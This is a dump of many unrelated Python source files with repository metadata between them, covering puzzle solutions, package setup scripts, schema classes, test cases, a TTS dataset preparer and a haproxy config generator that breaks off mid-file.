line = lineme(row)
print("part 1:",scoreme(line))
def overlap(a,b):
if a==b:
return True
if a[0]>=b[0] and a[1]<=b[1]:
return True
else:
return False
def cm(a,b):
if a==b:
return 0
if a[0]==b[0]:
if a[1]==b[1]:
return 0
if a[1]<b[1]:
return -1
return 1
if a[0]<b[0]:
return -1
return 1
from functools import cmp_to_key
for i in range(0,4000000):
line = lineme(i)
line= sorted(list(line),key=cmp_to_key(cm))
x=0
for j in line:
if j[0]<x:
if j[1]<x:
continue
if j[0]-x == 2:
print ("part 2:", i+(x+1)*4000000,line)
import sys
sys.exit()
x=j[1]
if x>4000000:
break
|
[
"githubkristian@snabela.nl"
] |
githubkristian@snabela.nl
|
d2c84ea4ee599a3dca31d420a60f2e17b98158a9
|
fa2526ce1d65a2e58958a61c34cee1ba7cf73b94
|
/setup.py
|
958cccc8103c3d1f18213fd6d55c4f3cb9978257
|
[
"ZPL-2.1"
] |
permissive
|
Zojax/zojax.portlets.livesearch
|
c480a19bd57b8b348032e40203696e4c53c68347
|
95f117ce89e0dc1fbfefdbec7969170caa3a1caf
|
refs/heads/master
| 2020-12-30T10:36:43.760852
| 2011-08-09T22:33:26
| 2011-08-09T22:33:26
| 2,035,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,552
|
py
|
##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Setup for zojax.portlets.livesearch package
$Id$
"""
import sys, os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
version='1.0.0dev'
setup(name = 'zojax.portlets.livesearch',
version = version,
author = 'Nikolay Kim',
author_email = 'fafhrd91@gmail.com',
description = "Google Ads portlet",
long_description = (
'Detailed Documentation\n' +
'======================\n'
+ '\n\n' +
read('CHANGES.txt')
),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Zope Public License',
'Programming Language :: Python',
'Natural Language :: English',
'Operating System :: OS Independent',
'Topic :: Internet :: WWW/HTTP',
'Framework :: Zope3'],
url='http://zojax.net/',
license='ZPL 2.1',
packages=find_packages('src'),
package_dir = {'':'src'},
namespace_packages=['zojax', 'zojax.portlets'],
install_requires = ['setuptools', 'simplejson',
'zope.component',
'zope.interface',
'zope.schema',
'zope.i18nmessageid',
'zojax.catalog',
'zojax.portlet',
'zojax.ownership',
'zojax.formatter',
'zojax.ui.searching',
'zojax.js.extjs',
'zojax.resource',
'zojax.resourcepackage',
],
extras_require = dict(test=['zojax.portlet [test]']),
include_package_data = True,
zip_safe = False
)
|
[
"andrey.fedoseev@gmail.com"
] |
andrey.fedoseev@gmail.com
|
74da8fcf18ff9a8150ba39ee90f91be05dea8255
|
0b70b9f582d2b010305ad1e5e4885f30435a5a74
|
/GUEST/forms.py
|
ae9847e5b58e1badfbd1bde00f04d04ed4a557f7
|
[] |
no_license
|
SruthiSasidharan/DjangoProjects
|
51fa60282b398f4ebf03383220ce046ae1e1beed
|
6fccc3e1d571638949953ed9fc390068417ce713
|
refs/heads/master
| 2023-06-28T02:24:32.355568
| 2021-07-29T07:45:26
| 2021-07-29T07:45:26
| 370,647,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
from Guest import forms
from .models import Review
from django.forms import ModelForm
class ReviewCreateForm(forms.ModelForm):
class Meta:
model=Review
fields=["review"]
|
[
"you@example.com"
] |
you@example.com
|
5be8330c7a2af0ba0d2b7752a2f74e9b0b078107
|
f16e6cff9270ffece7f28473a46a49f76044eae1
|
/data_and_proc/sp2genus.py
|
4fcb8182b68b5087bea63b7412024f334e0a339a
|
[] |
no_license
|
Klim314/pubcrawl
|
fe9e0a4ad0df35367a685856edb7983453fda345
|
cd873d0741c6ed1a09867ce86077927afd7be450
|
refs/heads/master
| 2021-01-18T19:17:49.786829
| 2015-06-19T03:48:03
| 2015-06-19T03:48:03
| 35,801,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
#!/usr/bin/env python3
import sys
target = sys.argv[1]
output = sys.argv[2]
holder =set()
with open(target) as f:
for i in f:
splat = i.strip().split("\t")
holder.add((splat[0].split(' ')[0], splat[1].split(' ')[0]))
with open(output, 'w') as f:
for i in holder:
f.write(" ".join(i) + '\n')
|
[
"klim314@gmail.com"
] |
klim314@gmail.com
|
626ef1a1961641711c3f61312880cea3994ab7ea
|
8d55d3a52ed6dc8111801cea9c7c9d0a84be736b
|
/src/662.maximum-width-of-binary-tree.py
|
236e7d52ce3fdc75ebc2866c5c0b37f29a9c687d
|
[] |
no_license
|
mic0ud/Leetcode-py3
|
2a23270034ec470571e57c498830b93af813645f
|
61fabda324338e907ce3514ae8931c013b8fe401
|
refs/heads/master
| 2022-12-26T11:52:31.666395
| 2020-09-27T19:27:10
| 2020-09-27T19:27:10
| 297,135,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,889
|
py
|
#
# @lc app=leetcode id=662 lang=python3
#
# [662] Maximum Width of Binary Tree
#
# https://leetcode.com/problems/maximum-width-of-binary-tree/description/
#
# algorithms
# Medium (39.55%)
# Likes: 860
# Dislikes: 187
# Total Accepted: 45.6K
# Total Submissions: 115.4K
# Testcase Example: '[1,3,2,5,3,null,9]'
#
# Given a binary tree, write a function to get the maximum width of the given
# tree. The width of a tree is the maximum width among all levels. The binary
# tree has the same structure as a full binary tree, but some nodes are null.
#
# The width of one level is defined as the length between the end-nodes (the
# leftmost and right most non-null nodes in the level, where the null nodes
# between the end-nodes are also counted into the length calculation.
#
# Example 1:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \ \
# 5 3 9
#
# Output: 4
# Explanation: The maximum width existing in the third level with the length 4
# (5,3,null,9).
#
#
# Example 2:
#
#
# Input:
#
# 1
# /
# 3
# / \
# 5 3
#
# Output: 2
# Explanation: The maximum width existing in the third level with the length 2
# (5,3).
#
#
# Example 3:
#
#
# Input:
#
# 1
# / \
# 3 2
# /
# 5
#
# Output: 2
# Explanation: The maximum width existing in the second level with the length 2
# (3,2).
#
#
# Example 4:
#
#
# Input:
#
# 1
# / \
# 3 2
# / \
# 5 9
# / \
# 6 7
# Output: 8
# Explanation:The maximum width existing in the fourth level with the length 8
# (6,null,null,null,null,null,null,7).
#
#
#
#
# Note: Answer will in the range of 32-bit signed integer.
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from queue import Queue
class Solution:
def widthOfBinaryTree(self, root: TreeNode) -> int:
if not root:
return 0
q = Queue()
q.put([root])
res = 1
while True:
nodes = q.get()
next_ = []
i, start, end = 0, 0, 0
while i < len(nodes) and not nodes[i]:
i += 1
if i == len(nodes):
break
start, i = i, len(nodes)-1
while i > start and not nodes[i]:
i -= 1
end = i
res = max(res, end-start+1)
for k in range(start, end+1):
next_.append(nodes[k].left if nodes[k] else None)
next_.append(nodes[k].right if nodes[k] else None)
q.put(next_)
return res
# @lc code=end
|
[
"ebizui@gmail.com"
] |
ebizui@gmail.com
|
59a36d90be34893265567174228a0d09d2ef132f
|
bad62c2b0dfad33197db55b44efeec0bab405634
|
/sdk/ml/azure-ai-ml/azure/ai/ml/_schema/compute/usage.py
|
39e0151c3a84f06270af1fa3cdc4323d144b0afe
|
[
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
test-repo-billy/azure-sdk-for-python
|
20c5a2486456e02456de17515704cb064ff19833
|
cece86a8548cb5f575e5419864d631673be0a244
|
refs/heads/master
| 2022-10-25T02:28:39.022559
| 2022-10-18T06:05:46
| 2022-10-18T06:05:46
| 182,325,031
| 0
| 0
|
MIT
| 2019-07-25T22:28:52
| 2019-04-19T20:59:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=unused-argument,no-self-use
from marshmallow import fields
from marshmallow.decorators import post_load
from azure.ai.ml._restclient.v2021_10_01.models import UsageUnit
from azure.ai.ml._schema.core.fields import NestedField, StringTransformedEnum, UnionField
from azure.ai.ml._schema.core.schema_meta import PatchedSchemaMeta
from azure.ai.ml._utils.utils import camel_to_snake
class UsageNameSchema(metaclass=PatchedSchemaMeta):
value = fields.Str()
localized_value = fields.Str()
@post_load
def make(self, data, **kwargs):
from azure.ai.ml.entities import UsageName
return UsageName(**data)
class UsageSchema(metaclass=PatchedSchemaMeta):
id = fields.Str()
aml_workspace_location = fields.Str()
type = fields.Str()
unit = UnionField(
[
fields.Str(),
StringTransformedEnum(
allowed_values=UsageUnit.COUNT,
casing_transform=camel_to_snake,
),
]
)
current_value = fields.Int()
limit = fields.Int()
name = NestedField(UsageNameSchema)
|
[
"noreply@github.com"
] |
test-repo-billy.noreply@github.com
|
bed1f026290d30ab652af5f006794bd8fbc9f765
|
c71af56951d1c661a5819db72da1caccd9130df2
|
/python/utils/ad_tests_mover.py
|
589995b4d3a1d5c721e5c9a0815c477fcb302fc7
|
[] |
no_license
|
adrianpoplesanu/personal-work
|
2940a0dc4e4e27e0cc467875bae3fdea27dd0d31
|
adc289ecb72c1c6f98582f3ea9ad4bf2e8e08d29
|
refs/heads/master
| 2023-08-23T06:56:49.363519
| 2023-08-21T17:20:51
| 2023-08-21T17:20:51
| 109,451,981
| 0
| 1
| null | 2022-10-07T04:53:24
| 2017-11-03T23:36:21
|
Python
|
UTF-8
|
Python
| false
| false
| 457
|
py
|
limit = 95
def format_2digits(i):
if i < 10:
return "test0" + str(i)
else:
return "test" + str(i)
def format_3digits(i):
if i < 10:
return "test00" + str(i)
elif i < 100:
return "test0" + str(i)
else:
return "test" + str(i)
if __name__ == '__main__':
for i in range(1, limit + 1):
print ("mv " + format_2digits(i) + ".ad " + format_3digits(i) + ".ad ;")
print ("echo 'done'")
|
[
"adrian.poplesanu@yahoo.com"
] |
adrian.poplesanu@yahoo.com
|
ae269fbeb63c445ff3f0b9c7c9b142899a832f1f
|
f506dc8837e55dc1d8c023360d3395c1d24833e8
|
/prepare-dataset.py
|
0b3821e4fe3f99018e9f87a64387bf438986a1dc
|
[
"MIT"
] |
permissive
|
hommmm/ParallelTTS
|
0f82ed29cdad0441ce491987b72ef17027b48359
|
d0e967d6d471bc901c85181a3b734d4df445dd08
|
refs/heads/main
| 2023-04-24T05:34:10.327568
| 2021-04-15T06:37:29
| 2021-04-15T06:37:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,446
|
py
|
#!/usr/bin/env python
"""Download and preprocess datasets. Supported datasets are:
* English female: LJSpeech
* Mandarin female: BBSpeech (BIAOBEI)
* Tibetan female: TBSpeech (Non-public)
* Mongolian male: MBSpeech (Mongolian Bible)
* Korean female: KSSpeech (Kaggle Korean Single Speech)
* Cantonese male: HKSpeech (Common Voice, Hong Kong)
* Japanese female: JPSpeech (JSUT Speech Corpus)
"""
__author__ = 'Atomicoo'
import sys
import os
import os.path as osp
import argparse
import pandas as pd
from utils.hparams import HParam
from utils.utils import download_file
from helpers.processor import Processor
from datasets.dataset import SpeechDataset
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', default=None, type=str, help='Config file path')
parser.add_argument('--compute', action='store_true', help='Pre-compute dataset statistics')
args = parser.parse_args()
hparams = HParam(args.config) \
if args.config else HParam(osp.join(osp.abspath(os.getcwd()), 'config', 'default.yaml'))
datasets_path = hparams.data.datasets_path
dataset_file_url = \
f'https://open-speech-data.oss-cn-hangzhou.aliyuncs.com/{hparams.data.dataset_dir}.tar.bz2'
dataset_file_name = osp.basename(dataset_file_url)
dataset_dir = dataset_file_name[:-8]
dataset_path = osp.join(datasets_path, dataset_dir)
wavfile_path = osp.join(dataset_path, "wavs")
melspec_path = osp.join(dataset_path, "mels")
if osp.isdir(melspec_path) and False:
print("%s dataset folder already exists" % dataset_dir)
sys.exit(0)
else:
dataset_file_path = osp.join(datasets_path, dataset_file_name)
if not osp.isfile(dataset_file_path):
download_file(dataset_file_url, dataset_file_path)
else:
print("'%s' already exists" % dataset_file_name)
if not osp.isdir(wavfile_path):
print("extracting '%s'..." % dataset_file_name)
os.system('cd %s; tar xvjf %s' % (datasets_path, dataset_file_name))
else:
print("'%s' already exists" % wavfile_path)
dataset_root = osp.join(hparams.data.datasets_path, hparams.data.dataset_dir)
dataset = SpeechDataset([], dataset_root, hparams.text)
processor = Processor(hparams=hparams.audio)
# pre process/compute
if args.compute:
processor.precompute(dataset_path, dataset)
else:
processor.preprocess(dataset_path, dataset)
|
[
"atomicoo95@gmail.com"
] |
atomicoo95@gmail.com
|
04dc23f98eeb652b65e913bb594e023fbe573c31
|
ce0f8956c4c308c67bd700d31fe8d5a17b16ac08
|
/Python3/src/14 Testing/TDD/point.py
|
5f5392393d0de4173dee22fb7258d9404262882e
|
[] |
no_license
|
seddon-software/python3
|
795ae8d22a172eea074b71d6cd49d79e388d8cc6
|
d5e6db1509a25c1a3040d5ae82d757539a2ff730
|
refs/heads/master
| 2021-07-10T15:48:31.893757
| 2020-07-16T20:29:22
| 2020-07-16T20:29:22
| 175,872,757
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
class Point:
def __init__(self, x0, y0, name):
self.x = x0
self.y = y0
self.name = name
def moveBy(self, dx, dy):
self.x += dx
self.y += dy
def display(self):
print(f"Point {self.name} is at [{self.x},{self.y}]")
|
[
"seddon-software@keme.co.uk"
] |
seddon-software@keme.co.uk
|
0eed8c89461eb6c3b8d3047d689917d934f242ea
|
edf125be37a40caeb14c7fe32bd9f7511cf0ce9b
|
/07-cleaning-data-in-python/5-case-study/checking_data_types.py
|
dbf0982d7a52005d2ab359bdf31bf73197f34252
|
[] |
no_license
|
vedpbharti/Datacamp
|
1d3d2ca0722a3a19733e91fa054f64e0c3b7114a
|
b6d019efebe1b46765f19212ba2d8ebb9d90de57
|
refs/heads/master
| 2020-04-05T05:47:28.528088
| 2019-02-10T22:34:00
| 2019-02-10T22:34:00
| 156,610,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,221
|
py
|
'''Checking the data types
Now that your data is in the proper shape, you need to ensure that the columns are of the proper data type. That is, you need to ensure that country is of type object, year is of type int64, and life_expectancy is of type float64.
The tidy DataFrame has been pre-loaded as gapminder. Explore it in the IPython Shell using the .info() method. Notice that the column 'year' is of type object. This is incorrect, so you'll need to use the pd.to_numeric() function to convert it to a numeric data type.
NumPy and pandas have been pre-imported as np and pd.
Instructions
100 XP
Convert the year column of gapminder using pd.to_numeric().
Assert that the country column is of type np.object. This has been done for you.
Assert that the year column is of type np.int64.
Assert that the life_expectancy column is of type np.float64.'''
# Convert the year column to numeric
gapminder.year = pd.to_numeric(gapminder['year'], errors='coerce')
# Test if country is of type object
assert gapminder.country.dtypes == np.object
# Test if year is of type int64
assert gapminder.year.dtypes == np.int64
# Test if life_expectancy is of type float64
assert gapminder.life_expectancy.dtypes == np.float64
|
[
"ved.bhartig@gmail.com"
] |
ved.bhartig@gmail.com
|
895a00118a48a46da43842ed361ef90b4bf75bc7
|
f023692f73992354a0b7823d9c49ae730c95ab52
|
/AtCoderRegularContest/109/B.py
|
e8f63dd4b86156a7a7784479c9988ed5e778177a
|
[] |
no_license
|
corutopi/AtCorder_python
|
a959e733f9a3549fab7162023e414ac2c99c4abe
|
a2c78cc647076071549e354c398155a65d5e331a
|
refs/heads/master
| 2023-08-31T09:40:35.929155
| 2023-08-20T06:19:35
| 2023-08-20T06:19:35
| 197,030,129
| 1
| 0
| null | 2022-06-22T04:06:28
| 2019-07-15T15:57:34
|
Python
|
UTF-8
|
Python
| false
| false
| 694
|
py
|
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
def binary_search(ok, ng, solve):
"""2分探索"""
while abs(ok - ng) > 1:
mid = (ok + ng) // 2
if solve(mid):
ok = mid
else:
ng = mid
return ok
# from decorator import stop_watch
#
#
# @stop_watch
def solve(n):
def solve(x):
if (x * (x + 1)) // 2 <= n + 1:
return True
return False
print(n - binary_search(1, n + 1, solve) + 1)
if __name__ == '__main__':
n = int(input())
solve(n)
# # test
# from random import randint
# from func import random_str, random_ints
# solve()
|
[
"39874652+corutopi@users.noreply.github.com"
] |
39874652+corutopi@users.noreply.github.com
|
03c7167733f235f4307297442c65882718598a6e
|
7b97d6fef74b35d2f26a9fed79b5b15782f8f9a5
|
/examples/basic_example.py
|
6ea409ffd7dddf1566fbada82d53d23511f7979b
|
[
"MIT"
] |
permissive
|
Edinburgh-Genome-Foundry/tatapov
|
22ac8e1fc506267a5d85f6063596485e9fdba9e4
|
06c2aa13e49affc7419e16e853d31c835813fe04
|
refs/heads/master
| 2023-09-03T22:28:55.443170
| 2022-05-06T13:41:32
| 2022-05-06T13:41:32
| 150,324,605
| 12
| 2
|
NOASSERTION
| 2020-09-08T23:31:43
| 2018-09-25T20:22:46
|
Python
|
UTF-8
|
Python
| false
| false
| 242
|
py
|
import tatapov
data = tatapov.annealing_data["25C"]["01h"]
subset = tatapov.data_subset(data, ["ACGA", "AAAT", "AGAG"], add_reverse=True)
ax, _ = tatapov.plot_data(subset, figwidth=5)
ax.figure.tight_layout()
ax.figure.savefig("example.png")
|
[
"valentin.zulkower@gmail.com"
] |
valentin.zulkower@gmail.com
|
7ae787bca6218c85ab763ed18d5cc546dd7a9f72
|
866418a05db550487e5eb6f5063f04f1241ccb4a
|
/example/11/╡┌11.3_1.py
|
39c0355ca01e72cc70a9202afd65d0b91cafe609
|
[] |
no_license
|
Freshield/LEARN_Python_Crawler
|
37cd552de8fb3f30157326a22a6b5cd62bd74703
|
53406cac38c27960e863c7bd5366bd1ae01ecd6c
|
refs/heads/main
| 2023-02-19T00:36:52.548150
| 2021-01-23T03:40:20
| 2021-01-23T03:40:20
| 326,993,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
import pymongo
# 创建对象,连接本地数据库。
# 方法一:
client = pymongo.MongoClient()
# 方法二:
client = pymongo.MongoClient('localhost', 27017)
# 方法三:
client = pymongo.MongoClient('mongodb://localhost:27017/')
# 连接DB数据库
db = client['DB']
# 连接集合user,集合类似关系数据库的数据表
# 如果集合不存在,会新建集合user
user_collection = db.user
# 设置文档格式(文档即我们常说的数据)
|
[
"zxdsw199182@gmail.com"
] |
zxdsw199182@gmail.com
|
12598f014099deae48cea3f0402d007713858b5a
|
1fc45a47f0e540941c87b04616f3b4019da9f9a0
|
/tests/sentry/api/serializers/test_grouptagvalue.py
|
d328f092a3656452391add7aa2fc5d6ee396d281
|
[
"BSD-2-Clause"
] |
permissive
|
seukjung/sentry-8.15.0
|
febc11864a74a68ddb97b146cc1d2438ef019241
|
fd3cab65c64fcbc32817885fa44df65534844793
|
refs/heads/master
| 2022-10-28T06:39:17.063333
| 2018-01-17T12:31:55
| 2018-01-17T12:31:55
| 117,833,103
| 0
| 0
|
BSD-3-Clause
| 2022-10-05T18:09:54
| 2018-01-17T12:28:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,697
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import EventUser, GroupTagValue, TagValue
from sentry.testutils import TestCase
class GroupTagValueSerializerTest(TestCase):
def test_with_user(self):
user = self.create_user()
project = self.create_project()
euser = EventUser.objects.create(
project=project,
email='foo@example.com',
)
tagvalue = TagValue.objects.create(
project=project,
key='sentry:user',
value=euser.tag_value,
)
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key=tagvalue.key,
value=tagvalue.value,
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == euser.get_label()
def test_with_no_tagvalue(self):
user = self.create_user()
project = self.create_project()
grouptagvalue = GroupTagValue.objects.create(
project=project,
group=self.create_group(project=project),
key='sentry:user',
value='email:foo@example.com',
)
result = serialize(grouptagvalue, user)
assert result['id'] == six.text_type(grouptagvalue.id)
assert result['key'] == 'user'
assert result['value'] == grouptagvalue.value
assert result['name'] == grouptagvalue.value
|
[
"jeyce@github.com"
] |
jeyce@github.com
|
d96347873e9e35694bfbbc5d8c3adf35d0c11a59
|
157d0810d40bbb165889f946566346663cf5b22f
|
/Python-For-Everyone-Horstmann/Chapter9-Objects-and-Classes/P9_25.py
|
4f372df40188975237fd47929d3e6603486ef014
|
[] |
no_license
|
dg5921096/Books-solutions
|
e6ccdcaba0294bdc95e2267723a02d2ba090cb10
|
31bb4bba240bf95aafeb6d189eade62c66a1765a
|
refs/heads/master
| 2021-12-09T16:07:47.756390
| 2021-11-14T07:09:25
| 2021-11-14T07:09:25
| 255,447,147
| 0
| 0
| null | 2020-04-13T21:39:02
| 2020-04-13T21:39:01
| null |
UTF-8
|
Python
| false
| false
| 794
|
py
|
# Design a class Mailbox that stores e-mail messages, using the Message class of Exercise
# P9.24. Implement the following methods:
# • def addMessage(self, message)
# • def getMessage(self, index)
# • def removeMessage(self, index)
class Mailbox():
def __init__(self):
self._mails = []
def list_messages(self):
output = []
for i, message in enumerate(self._mails):
output.append("[{}] From: {}, To: {}".format(i, message.get_sender(), message.get_recipient()))
return "\n".join(output)
def add_message(self, message_object):
self._mails.append(message_object)
def get_message(self, index):
return self._mails[index].to_string()
def remove_message(self, index):
del self._mails[index]
|
[
"syndbe@gmail.com"
] |
syndbe@gmail.com
|
69125d0d670089b391b47812638b43f7c459c0b5
|
396f93d8e73c419ef82a94174815a2cecbb8334b
|
/.history/tester2_20200322174510.py
|
7aa63cf5264177dcd88e4e6fbb297d2a899aa036
|
[] |
no_license
|
mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch
|
8c73d9448b916009c9431526864a4441fdeb682a
|
90b2dca920c85cddd7c1b3335344ac7b10a9b061
|
refs/heads/master
| 2021-03-26T21:16:42.561068
| 2020-04-17T21:44:26
| 2020-04-17T21:44:26
| 247,750,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,365
|
py
|
import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 100
tabuIteration = '1000'
tabuDuration = '40'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
if int(solution) != 5644:
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('{} : best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(i, solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {max(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
unique_local_minimum = list(dict.fromkeys(local_minimum))
print(f'totally the algorithm was stuck in local optimum {len(local_minimum)} times \nthere are {len(unique_local_minimum)} unique local minimum \nthe best local optimum is {min(unique_local_minimum)} \nthe worst local optimum is {max(unique_local_minimum)}')
|
[
"farzam.mirmoeini@gmail.com"
] |
farzam.mirmoeini@gmail.com
|
8920f1e323513222adafbd77853f23a6f87ca1e2
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/GPMM/YW_GPMM_SZSJ_287.py
|
dd5bdfe7fc378edf0289633f7e8debff4b950338
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,063
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_GPMM_SZSJ_287(xtp_test_case):
# YW_GPMM_SZSJ_287
def test_YW_GPMM_SZSJ_287(self):
title = '深A本方最优卖(卖出数量=可用股份数+100)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11010121,
'errorMSG': queryOrderErrorMsg(11010121),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('003123', '2', '0', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':trade_type + 1,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_FORWARD_BEST'],
'price': stkparm['涨停价'],
'quantity': 100100,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
987ab0b6c6d56227783ce5d319a505c1c5526fbf
|
aa64c62a3d246b87f3f1e5810a8f75b1d166aaf6
|
/paradrop/daemon/paradrop/core/config/haproxy.py
|
fc29f54f582c5117987eb8e786324404287cdf69
|
[
"Apache-2.0"
] |
permissive
|
ParadropLabs/Paradrop
|
ca40b3373c0732c781f9c10d38da9b6e9fbd3453
|
c910fd5ac1d1b5e234f40f9f5592cc981e9bb5db
|
refs/heads/master
| 2023-02-26T17:51:53.058300
| 2022-03-01T17:46:10
| 2022-03-01T17:46:10
| 37,789,450
| 88
| 31
|
Apache-2.0
| 2023-02-16T05:24:46
| 2015-06-20T23:18:38
|
Python
|
UTF-8
|
Python
| false
| false
| 5,061
|
py
|
"""
This module is responsible for configuration haproxy.
"""
import os
import subprocess
from paradrop.base import settings
from paradrop.core.chute.chute_storage import ChuteStorage
from paradrop.core.container.chutecontainer import ChuteContainer
def generateConfigSections():
sections = []
sections.append({
"header": "global",
"lines": [
"daemon",
"maxconn 256",
]
})
sections.append({
"header": "defaults",
"lines": [
"mode http",
"timeout connect 5000ms",
"timeout client 50000ms",
"timeout server 50000ms"
]
})
sections.append({
"header": "backend portal",
"lines": [
"server pd_portal 127.0.0.1:8080 maxconn 256"
]
})
# Custom variables:
# - req.querymarker: will be set to the literal "?" if the original request
